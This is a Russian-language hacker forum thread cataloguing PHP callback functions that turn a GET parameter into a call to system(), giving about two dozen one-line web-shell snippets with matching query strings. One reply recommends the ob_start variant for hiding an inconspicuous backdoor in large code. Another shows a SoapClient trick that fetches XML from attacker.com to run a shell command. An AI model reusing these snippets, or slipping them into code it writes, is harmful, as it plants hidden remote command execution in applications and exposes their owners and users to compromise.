Server-Side Функции обратного вызова

Discussion in 'База Знаний' started by l1ght, 6 Apr 2019.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    актуальные в php7.3, вызывать будем system("id");

    1. array_map
    Code:
    array_map($_GET[x],$_GET);
    ?x=system&_=id
    2. array_walk, array_filter, array_walk_recursive
    Code:
    array_walk($_GET,$_GET[x]);
    ?x=system&_=id
    3. array_udiff
    Code:
    array_udiff($_GET,$_GET,$_GET[x]);
    ?x=system&_=id&1
    4. array_reduce
    Code:
    array_reduce([1],$_GET[x],$_GET[_]);
    ?x=system&_=id
    5. array_udiff_assoc, array_uintersect, array_uintersect_assoc
    Code:
    array_udiff_assoc($_GET,$_GET,$_GET[x]);
    ?x=system&_=id
    6. array_intersect_uassoc, array_diff_ukey, array_diff_uassoc
    Code:
    array_intersect_uassoc($_GET,$_GET,$_GET[x]);
    ?x=system&id=1
    7. array_uintersect_uassoc, array_udiff_uassoc
    Code:
    array_uintersect_uassoc($_GET, $_GET, $_GET[x],_);
    ?x=system&_=id
    8. usort, uasort, ArrayObject::uasort
    Code:
    usort($_GET,$_GET[x]);
    ?x=system&_=id&1
    9. uksort, ArrayObject::uksort
    Code:
    uksort($_GET,$_GET[x]);
    ?x=system&id=1&1
    10. call_user_func
    Code:
    call_user_func($_GET[x], $_GET[_]);
    ?x=system&_=id
    11. call_user_func_array
    Code:
    call_user_func_array($_GET[x], $_GET);
    ?_=id&x=system
    12. iterator_apply
    Code:
    iterator_apply(new ArrayObject([1]),$_GET[w],$_GET);
    ?_=id&w=system
    13. register_tick_function
    Code:
    declare(ticks=1);
    register_tick_function($_GET[x],$_GET[_]);
    ?x=system&_=id
    14. forward_static_call
    Code:
    class A
    {
        function __construct() {
            forward_static_call($_GET[x],$_GET[_]);
        }
    }
    new A;
    ?x=system&_=id
    15 forward_static_call_array
    Code:
    class A
    {
        function __construct() {
            forward_static_call_array($_GET[x],$_GET);
        }
    }
    new A;
    ?_=id&x=system
    16. session_set_save_handler
    Code:
    session_set_save_handler($_GET[x],_,_,_,_,_);
    ini_set('session.save_path',$_GET[_]);
    session_start();
    ?x=system&_=id
    17. sqlite::createFunction
    Code:
    $x=$_GET[x];
    $db = new SQLite3(':memory:');
    $db->createFunction($x,$x);
    $db->querySingle("select $x('$_GET[_]')");
    ?x=system&_=id
    18. spl_autoload_register
    Code:
    spl_autoload_register($_GET[x]);
    new $_GET[_];
    ?x=system&_=id
    19. ob_start
    Code:
    ob_start($_GET[x]);
    echo $_GET[_];
    ?>
    ?x=system&_=id
    20. set_exception_handler
    Code:
    set_exception_handler($_GET[x]);
    throw new Exception(";$_GET[_];#");
    ?_=id&x=system
    21. register_shutdown_function
    Code:
    register_shutdown_function($_GET[x],$_GET[_]);
    ?x=system&_=id
     
    =HALK=, MichelleBoxing, t0ma5 and 5 others like this.
  2. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    249
    Likes Received:
    123
    Reputations:
    63
    Лайк.
    Из всех перечисленных самый интересный это с ob_start, хороший вариант спрятать в большом участке кода беспалевную закладку.
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    538
    Likes Received:
    1,002
    Reputations:
    333
    Немного наркомании в тред :)
    PHP:
    <?php
    $client 
    = new SoapClient(null, array(
    'location' => 'http://attacker.com/evil.xml',
    'typemap' => [['type_ns' => 'http://windows.must.die''type_name' => 'bad''from_xml' => 'system']],
    'uri'      => 'http://localhost/'));

    $client->x();

    http://attacker.com/evil.xml:
    PHP:
    <?xml version="1.0" encoding="utf-8"?>
    <env:Envelope xmlns:env="http://schemas.xmlsoap.org/soap/envelope/"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
      xmlns:xsd="http://www.w3.org/2001/XMLSchema"
      xmlns:enc="http://schemas.xmlsoap.org/soap/encoding/"
      xmlns:ns1="http://windows.must.die"
    >
    <env:Body>
      <ns1:drugs>
        <bad xsi:type="ns1:bad">x;
    touch /tmp/pwned;
        </bad>
      </ns1:drugs>
    </env:Body>
    <env:Header/>
    </env:Envelope>
     
    =HALK=, BabaDook and l1ght like this.
  4. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    1,986
    Likes Received:
    868
    Reputations:
    198
    из всех перечисленных как раз ob_start может вызвать проблемы, нужно смотреть не используются ли другие механизмы кеширования буфера и не забывать про ob_end_flush()
     
    _________________________
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    unserialize_callback_func
    Code:
    $c='O:2:"id":0:{}';
    ini_set('unserialize_callback_func', 'system');
    unserialize($c);
     
    dooble likes this.